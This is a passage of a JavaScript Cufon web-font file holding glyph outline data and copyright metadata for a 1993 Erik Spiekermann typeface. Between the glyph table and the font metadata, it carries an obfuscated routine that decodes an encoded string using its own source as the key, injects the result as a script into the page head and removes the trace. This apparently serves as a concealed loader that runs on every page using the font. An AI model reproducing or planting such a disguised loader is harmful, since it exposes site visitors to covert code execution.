-30,-28,-123,47,-123v26,0,51,7,75,23r-13,22v-26,-25,-110,-35,-110,19v0,55,87,39,113,75v48,65,-29,145,-115,112v-13,-4,-25,-9,-37,-17r13,-23v31,31,123,33,123,-25v0,-42,-64,-47,-96,-63","w":202},{"d":"116,-273r23,0r-93,326r-24,0","w":161},{"d":"45,-111r256,0r0,21r-256,0r0,-21","w":345},{"d":"10,-179r35,0r36,59r34,-59r33,0r-53,80r68,99r-34,0r-48,-76r-49,76r-33,0r67,-99","w":160},{"d":"30,0v-3,-58,7,-129,-6,-176r28,-8v2,10,6,17,6,29v11,-17,34,-35,60,-28r-11,31v-24,-7,-49,11,-49,40r0,112r-28,0","w":120},{"d":"47,-159v-44,-3,-28,-75,-1,-86v6,-4,11,-8,17,-11r10,16v-14,7,-22,18,-24,32v16,-3,23,10,23,23v0,14,-12,27,-25,26","w":93},{"d":"10,-247r35,0r49,91r47,-91r35,0r-62,112r78,135r-36,0r-61,-113r-58,113r-34,0r73,-132","w":194},{"d":"140,-131v65,1,71,105,16,124v-31,11,-81,6,-123,7r0,-247v70,0,152,-8,151,62v0,30,-20,45,-44,54xm152,-181v0,-43,-43,-43,-90,-41r0,81v46,1,90,4,90,-40xm164,-70v0,-51,-50,-48,-102,-46r0,92v50,0,102,7,102,-46","w":215},{"d":"91,-201r51,-18r7,21r-51,18r32,42r-18,14r-32,-44r-31,44r-18,-14r31,-42r-51,-18r7,-21r51,18r0,-54r22,0r0,54","w":159},{"d":"177,-90v11,79,-69,121,-119,74r0,85r-28,6r-4,-254r29,-5v1,8,2,17,2,27v47,-56,132,-13,120,67xm148,-86v-4,-37,-6,-70,-42,-72v-18,0,-34,9,-48,26r0,90v35,45,97,19,90,-44","w":196},{"d":"95,5v-53,0,-76,-41,-77,-96v-1,-54,26,-95,76,-94v56,1,78,40,78,98v0,56,-25,92,-77,92xm140,-85v0,-48,-8,-77,-46,-77v-35,0,-46,27,-45,67v0,41,7,76,47,76v34,0,44,-28,44,-66","w":193},{"d":"12,-114v73,-15,-21,-171,94,-150r0,22v-77,-17,-1,121,-68,139v42,7,29,71,31,120v1,17,17,20,37,18r0,21v-39,4,-63,-9,-63,-45v0,-43,10,-100,-31,-104r0,-21","w":119},{"d":"51,-213v1,-25,-11,-32,-37,-29r0,-22v67,-11,63,47,63,109v0,22,11,39,31,41r0,21v-72,7,23,168,-94,149r0,-21v77,17,1,-123,68,-139v-38,-7,-32,-63,-31,-109","w":119},{"d":"32,-99v-35,-47,17,-106,80,-83v10,3,19,6,27,10r-11,21v-28,-24,-100,-11,-73,33v28,19,100,17,92,65v2,65,-91,71,-134,40r11,-20v35,29,116,17,86,-34v-19,-16,-63,-12,-78,-32","w":163},{"d":"33,-247r30,0r0,222r97,0r-4,25r-123,0r0,-247","w":164},{"d":"112,4v-53,1,-80,-22,-80,-74r0,-177r29,0r0,166v-2,40,13,61,52,60v36,0,53,-15,53,-54r0,-172r29,0r0,176v3,58,-29,74,-83,75","w":227},{"d":"64,-116v0,75,13,133,63,157r-8,15v-104,-29,-112,-260,-27,-318v9,-7,18,-12,27,-15r7,13v-46,24,-62,75,-62,148","w":115},{"d":"187,-176v1,69,-52,83,-125,78r0,98r-29,0r0,-247r69,0v53,-3,85,27,85,71xm154,-171v0,-51,-41,-53,-92,-51r0,100v51,4,92,-1,92,-49","w":195},{"d":"22,-153v35,-50,168,-44,136,40v-16,42,-65,64,-101,91r114,-1r-6,23r-138,0v-6,-29,17,-31,28,-44v25,-28,74,-39,74,-87v0,-48,-75,-30,-95,-8"},{"d":"30,-179r29,-4r0,183r-29,0r0,-179xm45,-213v-12,0,-22,-9,-22,-21v0,-13,10,-23,22,-23v12,0,22,10,22,22v0,12,-9,23,-22,22","w":89},{"d":"46,-45v45,3,28,75,1,85v-6,4,-10,8,-16,11r-10,-15v14,-7,22,-18,24,-32v-15,2,-23,-11,-24,-23v-1,-14,12,-26,25,-26","w":96},{"d":"48,5v-13,0,-24,-12,-24,-25v-1,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-12,25,-24,25","w":95},{"d":"19,-179r119,0r0,23r-93,134r99,0r-13,22r-120,0r0,-22r98,-135r-90,0r0,-22","w":154},{"d":"93,-185v74,-7,91,100,25,112v28,6,50,25,50,55v0,65,-72,88,-140,82r-7,-19v61,6,115,-12,115,-66v0,-39,-34,-46,-77,-44r0,-20v37,1,73,-2,72,-38v0,-52,-75,-43,-100,-18r-13,-15v22,-16,42,-26,75,-29"},{"d":"21,-110r68,0r0,28r-68,0r0,-28","w":108},{"d":"52,-106v0,-75,-14,-133,-63,-158r8,-14v104,30,112,260,27,318v-9,7,-18,12,-27,15r-7,-14v47,-23,62,-75,62,-147","w":115},{"d":"-1,-247r36,0r60,122r61,-122r33,0r-80,151r0,96r-31,0r0,-98","w":188},{"d":"178,-88v0,56,-25,94,-80,94v-56,0,-81,-37,-81,-95v0,-57,26,-94,80,-94v57,0,81,39,81,95xm96,-160v-37,0,-50,25,-50,66v0,48,9,77,52,77v37,0,51,-25,50,-66v0,-48,-9,-77,-52,-77"},{"d":"82,-247v106,-11,141,86,114,179v-12,43,-41,68,-98,68r-65,0r0,-247r49,0xm171,-120v2,-74,-28,-112,-108,-103r0,199r48,-1v46,-4,59,-46,60,-95","w":227},{"d":"30,0v-3,-58,8,-130,-7,-176r28,-8v2,9,6,17,6,28v32,-39,105,-37,105,20r0,136r-28,0r-2,-141v-11,-34,-60,-10,-74,7r0,134r-28,0","w":190},{"d":"41,5v-13,0,-24,-12,-24,-25v0,-13,10,-24,23,-24v13,0,25,11,25,24v0,13,-12,25,-24,25xm124,5v-13,0,-25,-11,-25,-25v0,-13,11,-24,24,-24v13,0,25,11,25,24v0,13,-12,25,-24,25xm207,5v-13,0,-25,-11,-25,-25v0,-13,11,-24,24,-24v13,0,24,11,24,24v0,13,-12,25,-23,25","w":247},{"d":"43,-251v46,2,27,74,1,85v-6,4,-10,8,-16,11r-10,-16v14,-7,22,-18,24,-32v-13,5,-24,-10,-24,-22v-1,-14,11,-27,25,-26","w":93},{"d":"54,-255r26,0r0,87r-26,0r0,-87xm107,-255r26,0r0,87r-26,0r0,-87","w":186},{"d":"47,-159v-44,-3,-28,-75,-1,-86v6,-4,11,-8,17,-11r10,16v-14,7,-22,18,-24,32v16,-3,23,10,23,23v0,14,-12,27,-25,26xm118,-159v-44,-3,-28,-75,-1,-86v6,-4,11,-8,17,-11r10,16v-14,7,-22,18,-24,32v15,-2,23,10,23,23v0,14,-12,27,-25,26","w":164},{"d":"121,-138v83,9,71,142,-12,142r0,35r-21,0r0,-34v-32,0,-54,-10,-76,-23r13,-23v18,12,36,22,63,22r0,-97v-33,-10,-68,-23,-68,-65v0,-40,28,-69,68,-71r0,-30r21,0r0,30v23,2,45,9,65,23r-13,22v-17,-12,-29,-18,-52,-21r0,86xm88,-227v-31,1,-47,39,-28,62v5,7,15,12,28,17r0,-79xm109,-21v24,-4,39,-19,39,-45v0,-20,-13,-34,-39,-43r0,88","w":199},{"d":"24,-247r141,0r0,25r-118,197r119,0r-7,25r-147,0r0,-23r122,-199r-118,0","w":178},{"d":"114,-251v46,2,27,74,1,85v-6,4,-10,8,-16,11r-10,-16v14,-7,22,-18,24,-32v-13,5,-24,-10,-24,-22v-1,-14,11,-27,25,-26xm43,-251v46,2,27,74,1,85v-6,4,-10,8,-16,11r-10,-16v14,-7,22,-18,24,-32v-13,5,-24,-10,-24,-22v-1,-14,11,-27,25,-26","w":164},{"d":"33,-247r29,0r0,103r104,0r0,-103r29,0r0,247r-29,0r0,-120r-104,0r0,120r-29,0r0,-247","w":228},{"d":"33,-247r135,0r-4,25r-101,0r0,81r85,0r0,25r-85,0r0,90r109,0r0,26r-139,0r0,-247","w":184},{"d":"37,-255r26,0r0,87r-26,0r0,-87","w":100},{"d":"129,-19v0,-50,-62,-55,-99,-39r11,-121r107,0r-4,23r-77,0r-6,70v57,-6,99,14,99,67v0,65,-65,95,-130,82r-6,-22v47,16,105,-9,105,-60"},{"d":"89,-185v25,0,37,11,51,26v1,-7,1,-16,4,-20r27,0v-11,71,-2,166,-5,246r-27,6r0,-93v-45,51,-120,12,-120,-64v0,-59,19,-101,70,-101xm95,-21v21,0,36,-13,44,-28r0,-85v-26,-44,-105,-25,-90,43v0,40,7,70,46,70","w":195},{"d":"13,-103r64,0r0,-64r26,0r0,64r64,0r0,26r-64,0r0,64r-26,0r0,-64r-64,0r0,-26","w":180},{"d":"18,-87v0,-78,70,-123,125,-78r-16,20v-11,-9,-17,-14,-34,-14v-38,0,-41,32,-44,78v-4,57,52,84,83,43r16,18v-16,14,-29,23,-55,24v-51,-1,-75,-38,-75,-91","w":158},{"d":"8,-247r164,0r-2,25r-67,0r0,222r-28,0r0,-222r-67,0r0,-25","w":177},{"d":"53,-263v12,77,2,177,5,263r-28,0v-3,-85,6,-182,-5,-258xm127,-179r36,0r-71,77r87,102r-38,0r-82,-102","w":178},{"d":"33,-247r34,0r99,193v4,9,3,9,6,17r-4,-210r29,0r0,247r-31,0r-107,-211r5,211r-31,0r0,-247","w":230},{"d":"120,5v-71,0,-99,-55,-99,-130v0,-73,29,-126,98,-126v75,0,100,56,100,131v0,74,-29,125,-99,125xm186,-115v0,-62,-10,-113,-67,-113v-52,0,-67,42,-66,97v1,60,10,113,69,113v51,0,64,-43,64,-97","w":240},{"d":"54,-262v11,66,3,152,5,226v0,12,3,21,13,17r6,19v-22,11,-47,-1,-48,-30r-4,-226","w":89},{"d":"33,-247r29,0r0,247r-29,0r0,-247","w":95},{"d":"152,-205v22,0,33,12,41,30r6,-23r24,0r-33,115v-1,8,1,13,8,12v33,-6,50,-39,50,-78v0,-59,-41,-93,-98,-93v-68,0,-110,47,-110,115v0,68,44,111,110,114v39,2,73,-20,91,-44r23,0v-22,36,-57,63,-114,63v-81,0,-134,-52,-134,-133v0,-82,53,-134,134,-134v72,0,122,40,122,110v0,58,-35,97,-84,104v-15,2,-21,-12,-24,-24v-23,39,-101,26,-96,-32v4,-55,29,-102,84,-102xm152,-181v-38,3,-55,39,-58,76v-2,19,14,34,32,34v35,0,55,-40,55,-76v0,-20,-11,-32,-29,-34","w":288},{"d":"185,-115v-1,-62,-8,-113,-67,-113v-51,0,-66,42,-65,97v0,61,10,113,68,113v52,0,64,-42,64,-97xm118,-251v122,-6,129,202,48,244v24,9,46,33,81,25r-9,23v-50,16,-74,-32,-121,-36v-69,-5,-97,-57,-97,-130v0,-72,28,-122,98,-126","w":240},{"d":"98,-184r31,0r-84,163v24,-2,51,-1,77,-1r5,-94r23,-6r-1,100r30,-1r0,23r-30,0v2,19,1,42,1,63r-28,9r0,-72r-107,0r0,-22"},{"d":"19,-156r7,-23r150,0r-7,28v-43,63,-83,124,-104,208r-34,9v21,-88,69,-163,117,-222r-129,0"},{"d":"199,-245r24,0r-120,245r-23,0xm231,4v-36,0,-59,-25,-58,-62v0,-37,21,-62,57,-62v40,-1,59,27,59,64v0,35,-22,61,-58,60xm265,-55v0,-26,-8,-45,-35,-45v-25,-1,-33,16,-33,39v0,28,8,45,35,45v21,0,33,-15,33,-39xm70,-126v-37,0,-58,-25,-58,-62v0,-36,21,-61,58,-61v40,0,57,26,58,64v0,36,-22,59,-58,59xm104,-184v0,-26,-7,-45,-35,-45v-24,0,-32,15,-32,39v0,28,7,45,34,45v21,0,33,-15,33,-39","w":299},{"d":"54,4v-13,0,-23,-11,-23,-24v0,-13,11,-24,24,-24v12,0,24,11,24,24v0,13,-12,24,-25,24xm55,-109v-13,0,-24,-11,-24,-24v0,-13,11,-25,24,-25v12,0,24,11,24,24v0,13,-11,25,-24,25","w":108},{"d":"99,6v-95,4,-99,-139,-47,-192v29,-29,55,-51,97,-63r7,18v-51,18,-90,50,-102,106v42,-36,129,-14,124,53v-3,48,-32,75,-79,78xm145,-72v0,-56,-64,-61,-93,-31v-5,44,6,88,47,87v30,0,46,-24,46,-56"},{"d":"53,-109v-31,0,-33,-49,0,-49v13,0,24,12,24,24v0,13,-11,26,-24,25xm54,-45v44,2,28,75,1,85v-6,4,-10,8,-16,11r-11,-15v14,-7,23,-18,25,-32v-15,2,-23,-11,-24,-23v-1,-14,12,-26,25,-26","w":109},{"d":"4,-247r32,0r66,214r68,-214r31,0r-85,247r-29,0","w":204},{"d":"180,-34r34,-145r30,0r-51,180r-28,0r-41,-145r-40,145r-26,0r-50,-179r28,-6r36,148r39,-143r30,0","w":250},{"d":"78,-183r22,0r0,160r34,0r0,23r-95,0r0,-23r33,0r0,-125v-17,10,-31,15,-49,23r-6,-16","w":147},{"d":"180,-81v-21,0,-23,-36,0,-35v10,0,17,7,17,17v0,10,-7,18,-17,18xm23,-81v-24,-1,-20,-35,1,-35v10,0,17,7,17,17v0,11,-7,18,-18,18xm76,-81v-10,-1,-18,-8,-18,-18v0,-21,36,-23,35,0v0,10,-7,18,-17,18xm127,-81v-9,-1,-16,-8,-16,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,11,-7,18,-18,18xm328,-167v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,18,-17,18xm298,-210v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,17,8,17,18v0,10,-7,17,-17,17xm357,-125v-10,0,-16,-7,-16,-17v0,-10,7,-18,17,-18v10,0,17,8,17,18v0,10,-8,17,-18,17xm387,-82v-10,0,-17,-8,-17,-18v0,-10,8,-17,18,-17v10,0,17,7,17,17v0,11,-7,18,-18,18xm336,-81v-21,0,-23,-36,0,-35v10,0,17,7,17,17v0,10,-7,18,-17,18xm232,-81v-21,0,-23,-36,0,-35v10,0,17,7,17,17v0,10,-7,18,-17,18xm284,-81v-21,0,-23,-36,0,-35v10,0,17,7,17,17v0,10,-7,18,-17,18xm328,-32v10,0,17,7,17,17v0,10,-7,18,-17,18v-10,0,-17,-8,-17,-18v0,-10,7,-17,17,-17xm298,10v10,0,17,8,17,18v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18xm357,-75v11,0,18,7,18,18v0,10,-7,17,-17,17v-10,0,-17,-7,-17,-17v-1,-11,6,-18,16,-18","w":411},{"d":"33,-247r130,0r-5,25r-95,0r0,81r79,0r0,24r-79,0r0,117r-30,0r0,-247","w":161},{"d":"26,-149r188,0r0,24r-188,0r0,-24xm26,-93r188,0r0,24r-188,0r0,-24","w":239},{"d":"30,-247r30,0r0,247r-30,0r0,-247xm156,-247r38,0r-99,116r98,131r-37,0r-95,-131","w":198}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+82-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("vPp{R]t)x=nCv2dw}]KZ$P$nG~t{p]nCG~hZx=*Nps!ug_)aGdnX}Bqex]}Y@_n9B5XvGKOX2[8KP9$hvS&t3c@*5B#s=GgpxRD}J|q4a^.d]NYLVHurCi6lZ_){~WbeQw!nyU64pKhaG9#Z&[8_G={~h]XRcPpy}PKD}BO6gBX!G9#Z&B$Zs~se${tDS{l{&^Olt94ZG9#Z&[8b=8$VDPnw|Gt&s54@&].uSNY_S5dp&8*CG9#Z&[$~G9#Z&[8eG2hD}B$6&=&.=dl{&^Olp84Kh_slv~t#x)ecR8dO#B@WhBY~3{pW&BePc#uaSNt6RPd)v2$av5lLcBOuD[{aSNOuR[{6S]ldR]})x2lNc=$CpaeNR9d6x9&nJW)wx=gYgaeix_)iGaqU3N}W}{6CvB!Yc_YCv{6C}9t_G2eCR2..S~.C}Ps_}24uR~t4}PdiRaeYRWt)R]Krp5.Lp]nZv[rLcP6wvZrLv=}Rg{rLGs)nDKrLGG)Lv2.q")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":192,"face":{"font-family":"tss","font-weight":500,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 6 6 4 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"5","bbox":"-11 -282 405 75","underline-thickness":"7.2","underline-position":"-43.92","unicode-range":"U+0020-U+2122"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * 1993 Erik Spiekermann
 * 
 * Manufacturer:
 * Erik Spiekermann
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"233,-184v29,-2,38,29,31,56r-28,128r-29,0r29,-143v-6,-33,-49,-3,-59,9v-4,6,-10,10,-15,16r-25,118r-29,0r30,-143v-2,-23,-25,-16,-41,-5v-11,7,-22,18,-33,31r-25,117r-27,0v8,-57,33,-114,29,-172r26,-13v7,11,6,26,2,40v19,-21,36,-37,66,-38v23,-1,31,15,31,38v18,-21,39,-37,67,-39","w":283},{"d":"86,-265v4,17,3,41,-2,59r-44,206r-28,0r42,-199v4,-16,6,-39,2,-55xm95,-101r61,95r-27,11r-66,-109r93,-83r19,16","w":180},{"d":"98,0r-29,0r-31,-247r31,0r21,214r113,-214r32,0","w":206},{"d":"-3,41v62,21,142,-28,112,-93v-14,-20,-62,-15,-85,-6r38,-121r106,0r-9,23r-78,0r-21,70v54,-6,98,12,86,71v-12,59,-78,91,-148,78"},{"d":"55,-71r-22,0r31,-176r36,-5xm34,-42v12,0,22,10,22,22v0,13,-10,23,-22,23v-12,0,-22,-10,-22,-23v0,-12,10,-22,22,-22","w":95},{"d":"42,-228v31,-26,119,-38,118,22v-1,60,-85,58,-80,126r-24,0v-6,-57,42,-75,67,-100v17,-17,6,-47,-21,-46v-22,1,-34,8,-51,17xm58,-41v12,0,22,10,22,22v0,12,-10,22,-22,22v-12,0,-22,-9,-22,-22v0,-12,9,-23,22,-22","w":128},{"d":"77,-260v12,0,22,10,22,22v0,12,-9,23,-22,22v-12,0,-22,-9,-22,-21v0,-13,10,-23,22,-23xm42,-5v-8,38,-23,65,-58,76r-10,-18v24,-11,35,-29,40,-59r36,-172r30,-6","w":90},{"d":"88,-23r33,0r-5,23r-95,0r5,-23r33,0r27,-125v-17,10,-34,19,-53,26r-4,-19r71,-42r22,0","w":145},{"d":"68,-142v16,-20,36,-48,72,-40r-13,30v-32,-5,-47,18,-63,40r-24,112r-27,0r30,-152v0,-8,1,-14,-2,-20r26,-13v5,12,5,29,1,43","w":117},{"d":"17,-57v0,-95,86,-159,169,-112v-22,75,-35,158,-53,236r-28,6r22,-101v-24,46,-110,44,-110,-29xm47,-58v0,40,33,45,58,27v10,-6,20,-17,29,-33r19,-92v-64,-23,-106,35,-106,98","w":193},{"d":"154,-251v50,-1,81,30,78,83v-5,94,-35,171,-131,173v-52,1,-80,-36,-77,-88v5,-91,36,-166,130,-168xm108,-18v74,0,92,-80,92,-153v0,-35,-16,-57,-51,-57v-75,0,-89,76,-92,152v-2,38,16,58,51,58","w":237},{"d":"139,-183v27,-1,39,19,34,47r-29,136r-28,0r28,-141v-1,-26,-26,-19,-44,-8v-11,6,-24,17,-36,32r-24,117r-28,0v8,-57,33,-114,29,-172r26,-13v4,14,6,23,2,40v17,-22,38,-37,70,-38","w":194},{"d":"22,-85v0,-100,61,-182,165,-160v11,2,18,9,25,15r-16,19v-11,-11,-24,-15,-44,-15v-71,0,-92,70,-99,142v-6,64,69,78,109,47r12,21v-21,11,-44,20,-73,20v-53,-1,-79,-35,-79,-89"},{"d":"177,0r-29,0r26,-120r-105,0r-25,120r-29,0r53,-247r28,0r-21,103r104,0r22,-103r29,0","w":225},{"d":"68,-247r130,0r-10,25r-96,0r-17,81r79,0r-5,24r-79,0r-25,117r-30,0","w":161},{"d":"112,-96r-21,96r-31,0r21,-98r-48,-149r35,0r34,122r87,-122r35,0","w":193},{"d":"153,45r-180,0r3,-18r180,0","w":180},{"d":"13,-54v-2,-90,75,-159,160,-116v-11,41,-21,86,-28,131v-2,15,3,22,9,29r-22,17v-11,-11,-15,-19,-14,-39v-11,21,-32,35,-62,35v-32,-1,-42,-25,-43,-57xm42,-53v-1,37,33,37,56,20v31,-24,31,-81,43,-124v-65,-21,-97,42,-99,104","w":182},{"d":"15,-58v0,-79,58,-146,142,-118r18,-87r27,5r-46,218v0,15,4,21,9,30r-24,18v-10,-11,-15,-18,-13,-39v-16,21,-32,34,-63,34v-36,0,-50,-24,-50,-61xm151,-152v-64,-28,-106,32,-106,96v0,41,33,41,58,25v11,-6,20,-17,29,-33","w":199},{"d":"99,-247r-52,238v-10,29,-32,45,-61,55r-10,-18v30,-13,42,-31,50,-69r43,-206r30,0","w":96},{"d":"88,14r-50,-277r25,-5r50,276","w":133},{"d":"171,-138v0,36,-26,56,-55,65v23,4,39,22,39,47v0,72,-80,97,-159,90r-2,-20v65,6,130,-14,130,-70v0,-35,-31,-41,-69,-39v3,-6,0,-18,7,-20v46,4,78,-9,78,-48v0,-47,-72,-26,-97,-7r-10,-16v35,-30,138,-52,138,18"},{"d":"197,-224r-162,199r119,0r-9,25r-147,0r0,-23r165,-199r-118,0r10,-25r142,0r0,23","w":174},{"d":"67,-247v65,-1,135,-6,132,58v-3,49,-34,77,-85,78v26,25,45,68,58,107r-25,8v-20,-37,-34,-85,-64,-112v-4,-2,-9,-3,-15,-3r-24,111r-29,0xm72,-130v54,4,93,-7,95,-54v2,-40,-35,-39,-75,-38","w":205},{"d":"53,-63v-5,20,-9,47,14,45v28,-2,50,-22,64,-46r24,-113r29,-5v-9,52,-30,99,-30,155v0,7,4,12,8,17r-22,18v-10,-11,-15,-20,-14,-40v-17,21,-38,36,-68,38v-35,3,-42,-29,-35,-62r26,-122r29,-5"},{"d":"121,-180r32,42r-18,14r-32,-44r-32,44r-18,-14r32,-42r-51,-18r7,-21r51,18r0,-54r21,0r0,54r52,-18r6,21","w":159},{"d":"323,-93r-25,0r14,-115r-59,115r-20,0r-11,-117r-33,117r-24,0r46,-154r32,0r9,111r56,-111r33,0xm166,-226r-42,0r-28,133r-24,0r27,-133r-41,0r4,-21r110,0","w":356},{"d":"144,-230v-24,-17,-53,-11,-58,23r-5,28r50,0r-13,21r-41,0r-32,163v-6,32,-12,50,-28,70r-23,-13v36,-55,36,-147,55,-220r-18,0r4,-21r18,0v3,-57,42,-102,101,-73","w":103},{"d":"78,-213v3,-13,5,-29,-11,-29r-19,0r4,-22v35,-5,59,8,53,45v-5,30,-23,67,-9,94v4,8,10,11,18,11r-4,21v-79,11,-5,159,-126,149r5,-21v80,8,20,-117,97,-139v-39,-12,-15,-73,-8,-109","w":119},{"d":"175,-90r-175,0r5,-21r174,0","w":173},{"d":"76,2r-28,0r-26,-180r28,-6r18,154r82,-149r31,0","w":173},{"d":"17,-57v0,-93,87,-159,171,-112v-27,71,-18,179,-69,226v-27,25,-93,20,-124,0r10,-22v38,25,115,21,117,-30r7,-33v-24,47,-112,43,-112,-29xm48,-58v0,40,34,45,59,27v10,-6,20,-17,29,-33r20,-90v-65,-25,-108,33,-108,96","w":199},{"d":"75,-251v44,3,20,71,-4,80v-7,6,-17,12,-26,16r-9,-16v15,-5,25,-19,31,-32v-12,0,-20,-10,-19,-22v0,-15,11,-26,27,-26","w":93},{"d":"15,-57v0,-80,70,-159,143,-112r-13,22v-10,-8,-21,-13,-37,-12v-47,4,-59,53,-63,102v-4,48,53,48,77,19r11,18v-34,36,-118,34,-118,-37","w":154},{"d":"105,-249v29,-1,47,17,47,43v0,47,-26,80,-73,80v-28,0,-48,-15,-47,-45v3,-46,27,-76,73,-78xm85,0r-23,0r173,-247r23,0xm238,-120v29,-1,46,18,47,44v0,49,-27,80,-73,80v-28,0,-47,-15,-46,-45v2,-47,27,-77,72,-79xm84,-146v31,0,43,-25,43,-57v0,-18,-9,-27,-27,-27v-31,0,-42,26,-43,58v-1,19,10,26,27,26xm217,-16v30,0,43,-25,44,-57v0,-18,-10,-27,-28,-27v-31,0,-42,26,-43,58v0,18,10,26,27,26","w":299},{"d":"151,-168r-26,0r18,-87r26,0xm98,-168r-26,0r18,-87r26,0","w":186},{"d":"302,-90r-256,0r4,-21r257,0","w":345},{"w":81},{"d":"165,-77r-63,0r-13,64r-28,0r14,-64r-64,0r6,-26r63,0r14,-64r27,0r-13,64r63,0","w":180},{"d":"210,-117v-14,14,-27,32,-53,32v-30,0,-41,-24,-72,-24v-18,-1,-29,14,-36,25r-8,-18v13,-13,26,-31,52,-31v31,0,41,24,72,24v17,0,29,-14,36,-25","w":239},{"d":"140,-183v30,0,42,22,35,54r-27,129r-28,0r29,-139v-14,-45,-73,1,-84,22r-25,117r-28,0r42,-198v5,-24,6,-43,2,-56r30,-11v7,40,-7,85,-17,120v17,-22,40,-37,71,-38","w":194},{"d":"146,-251v39,2,26,59,4,73v-8,10,-22,18,-34,23r-9,-16v15,-5,26,-18,31,-32v-12,0,-20,-10,-19,-22v0,-15,11,-26,27,-26xm75,-251v44,3,20,71,-4,80v-7,6,-17,12,-26,16r-9,-16v15,-5,25,-19,31,-32v-12,0,-20,-10,-19,-22v0,-15,11,-26,27,-26","w":165},{"d":"120,-186v62,-4,65,67,25,97v-29,21,-66,47,-98,67r111,-1r-11,23r-138,0r5,-23r111,-80v20,-15,21,-63,-18,-59v-24,3,-42,13,-61,26r-9,-17v26,-20,46,-31,83,-33"},{"d":"34,-44v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v-1,-13,11,-24,24,-24","w":95},{"d":"157,-261v72,0,122,40,122,110v0,56,-34,104,-85,104v-13,0,-22,-10,-23,-24v-23,39,-101,26,-96,-32v4,-55,28,-102,84,-102v20,0,34,11,40,30r7,-23r23,0r-33,120v0,5,2,7,8,7v33,-7,51,-40,51,-78v0,-59,-42,-93,-98,-93v-69,0,-111,48,-111,115v0,68,44,114,111,114v39,0,73,-21,91,-44r23,0v-22,36,-58,63,-114,63v-83,0,-135,-51,-135,-133v0,-81,54,-134,135,-134xm132,-71v36,0,56,-39,56,-76v0,-18,-11,-34,-29,-34v-38,0,-55,38,-58,76v0,19,13,34,31,34","w":288},{"d":"98,-99r47,99r-33,0r-32,-77r-65,77r-34,0r88,-99r-38,-80r33,0r23,59r48,-59r33,0","w":160},{"d":"63,0v-25,11,-51,0,-44,-33r36,-167v5,-20,6,-38,1,-54r30,-11v6,87,-29,157,-39,238v0,9,8,10,15,8","w":89},{"d":"183,-179r-111,204v-15,26,-31,42,-62,49r-7,-19v29,-7,45,-27,55,-55r-12,1v-1,-64,-12,-119,-19,-178r30,-6r14,159r79,-155r33,0","w":166},{"d":"31,-22r99,0r-13,22r-121,0r0,-22r125,-135r-84,0r0,-22r119,0r0,22","w":154},{"d":"112,-185v67,0,79,78,53,136v-28,63,-92,110,-168,123r-11,-18v67,-14,120,-49,145,-104v-37,34,-118,19,-113,-45v5,-56,38,-92,94,-92xm50,-95v-5,54,57,52,87,26v16,-34,15,-95,-30,-94v-38,1,-55,30,-57,68"},{"d":"175,1r-27,0r-12,-145v-21,51,-47,96,-70,145r-27,0r-11,-179r28,-6r5,148r69,-143r30,0r8,145r65,-145r31,0","w":250},{"d":"62,-89v-11,39,-5,68,38,68v41,0,57,-21,65,-57r36,-169r29,0r-42,194v-10,40,-41,55,-91,57v-53,2,-77,-31,-66,-85r35,-166r29,0","w":219},{"d":"64,-87v-67,-28,-26,-99,38,-99v20,0,40,5,52,13r-11,22v-24,-23,-101,-16,-79,28v22,23,76,22,76,66v0,65,-95,76,-140,45r11,-22v31,30,118,19,92,-31v-5,-9,-27,-17,-39,-22","w":160},{"d":"213,0r-38,0r-2,-137v0,-25,0,-48,2,-70r-87,207r-38,0r-6,-247r31,0r-3,220r94,-220r33,0r2,187v0,14,-1,25,-2,33r92,-220r31,0","w":294},{"d":"83,5v-68,2,-79,-79,-53,-134v27,-59,87,-103,154,-121r4,21v-60,17,-104,50,-126,104v34,-33,118,-22,114,40v-4,57,-37,88,-93,90xm87,-17v38,-2,55,-27,57,-66v3,-52,-63,-44,-89,-20v-14,32,-9,88,32,86"},{"d":"138,0r-123,0r53,-247r29,0r-47,222r98,0","w":167},{"d":"214,-120v-6,32,-15,54,-30,75r36,45r-37,0r-19,-23v-31,38,-150,45,-147,-26v2,-45,30,-59,64,-75v-45,-40,-13,-112,54,-112v46,0,70,42,45,77v-11,17,-35,28,-55,38r45,57v10,-14,14,-36,19,-56r25,0xm111,-137v24,-11,49,-21,49,-53v0,-41,-69,-27,-70,9v-1,23,10,30,21,44xm48,-54v-2,50,84,43,104,14r-57,-69v-27,12,-46,23,-47,55","w":250},{"d":"66,-159v-49,0,-14,-81,13,-87v7,-4,12,-8,17,-10r9,16v-14,5,-25,19,-30,32v10,0,19,11,18,22v1,16,-12,27,-27,27","w":93},{"d":"184,-151r-84,106v-21,31,-41,66,-56,103r-36,9v34,-88,93,-161,152,-222r-128,1r10,-24r146,0"},{"d":"163,-261v-76,32,-104,117,-104,217v0,41,12,68,39,85r-11,15v-96,-45,-46,-247,12,-295v17,-14,37,-31,59,-38","w":122},{"d":"68,-247v87,-5,155,3,148,91v-7,87,-43,155,-136,156r-65,0xm50,-24v97,10,128,-48,134,-128v5,-60,-30,-77,-92,-71","w":225},{"d":"65,-158v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v0,-13,11,-24,24,-24xm41,-44v13,0,24,11,24,24v0,13,-12,25,-24,25v-13,0,-24,-12,-24,-25v-1,-13,11,-24,24,-24","w":108},{"d":"50,6v-8,2